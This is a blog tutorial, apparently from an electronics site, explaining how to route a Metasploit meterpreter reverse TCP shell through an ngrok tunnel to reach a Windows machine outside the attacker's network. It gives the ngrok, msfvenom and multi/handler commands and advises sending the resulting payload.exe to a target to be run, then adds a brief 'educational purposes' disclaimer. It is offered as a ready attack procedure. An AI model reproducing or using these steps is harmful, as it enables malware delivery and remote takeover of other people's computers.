Metasploit, packed with most dangerous payloads and exploits is of course a hacker’s must need tool; there is no doubt. It is very easy to scan, create payload, deliver it to the target and there you go.. You got the Shell!!
What if you want to take it outside you network? What if you need to test a remote server or a PC located outside the LAN? How can you exploit a machine using Metasploit without port forwarding?
ngrok is an amazing service that lets you connect to any device or a service which is located inside LAN or outside LAN) through any network without using port forwarding in the router. You can SSH, use FTP or Local device without Port Forwarding on your local network using ngrok. Click here to learn more about ngrok.
In this post, we will be making use of ngrok to create a metasploit reverse TCP payload and establish a reverse TCP connection from the target machine (Outside LAN) to our attacking machine.
First step, set up a free account in ngrok. Follow Step 1, 2 and 3 of the below guide to set one.
Once the registration is complete and the auth token is added to your PC, we will start ngrok on a TCP Port; say 9999 where metasploit will be listening for incoming reverse TCP connections.
./ngrok tcp 9999
If everything goes well, ‘Session Status’ will change to ‘online’ and something like this will be shown next to ‘Forwarding’
Forwarding tcp://0.tcp.ngrok.io:19631 -> localhost:9999
What does that ? Well, This means, all traffic to 0.tcp.ngrok.io through the port 19631 across the internet, will be redirected to port 9999 on the machine where this ngrok session is running. Leave it there.
Now we create a payload with the above-mentioned ngrok hostname and port as the payload’s LPORT and LHOST. Use the below command to create one.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=19631 -f exe > payload.exe
Here I will be using a windows payload as my target machine outside LAN is windows.
The metasploit payload has been created. Now in our machine, we will start the metasploit listener using the below commands.
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0 set
LPORT 9999
exploit
When you run ‘exploit’, it will start a listener on the port 9999.
Just send this file to your target machine and run the file by double clicking it.
There you go.. You got the shell…
Disclaimer: This is for educational purposes only. Any actions and or activities related to the material contained within this Website is solely your responsibility.The misuse of the information in this website can result in criminal charges brought against the persons in question. The authors will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law.
Discover creative ways to recycle old electronics into new, useful gadgets. Turn your electronic waste…
Explore the top 10 advanced LED projects that go beyond basic lighting. Perfect for electronics…
The integration of UV resin into the PCB production process represents a great achievement and…
Discover essential tips for electronics engineering graduates to gain practical experience, from internships to DIY…
Learn essential tips on setting up your workspace, choosing the right tools, and starting your…
The electronics sector is about to undergo a revolutionary period that will be characterized by…